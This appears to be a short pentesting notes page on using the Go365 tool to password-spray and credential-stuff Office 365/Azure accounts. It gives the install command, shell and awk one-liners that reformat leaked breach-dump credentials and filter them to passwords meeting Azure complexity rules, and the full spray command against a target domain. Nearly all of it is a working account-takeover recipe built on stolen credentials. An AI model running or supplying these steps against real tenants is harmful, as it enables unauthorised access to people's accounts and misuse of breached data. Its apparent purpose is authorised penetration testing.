# Go365
A [tool](https://github.com/optiv/Go365) for attacking O365 users with password stuffing/spraying.

## Install
```
wget https://github.com/optiv/Go365/releases/download/v2.0/Go365_2.0_Linux_x86_64.tar.gz
tar -xzvf Go365_2.0_Linux_x86_64.tar.gz
```

## Massage a CSV into a format Go365 can use
The example below works for a CSV extracted from [sysleaks.com](https://sysleaks.com/):

```
cut -d',' -f2,3 YOURCSV.csv | tr ',' ':' | sort -t':' -k1 | uniq > filtered.csv
```

## Then take THAT CSV and filter it even further so it meets Azure requirements
Which are:
* Minimum of 8 characters
* 3 of these 4 properties:
 * Uppercase letters
 * Lowercase letters
 * Numbers
 * Symbols

```
awk -F: '{
  pass=$2;
  classes=0;
  if (pass ~ /[a-z]/) classes++;
  if (pass ~ /[A-Z]/) classes++;
  if (pass ~ /[0-9]/) classes++;
  if (pass ~ /[^a-zA-Z0-9]/) classes++;
  if (length(pass) >= 8 && classes >= 3) print $0
}' filtered.csv > superfiltered.txt
```

## Spray a list of usernames and passwords against M365/Azure/whatever-they're-calling-it-this-week

```
./Go365 -endpoint graph -up UP.txt -debug -w 300 -o CLIENT_output.txt -d domain.com
```

The `UP.txt` would be a "users and passwords" file that you'd generate by some other means, such as a [dehashed dump](/pentesting/External/dehashed).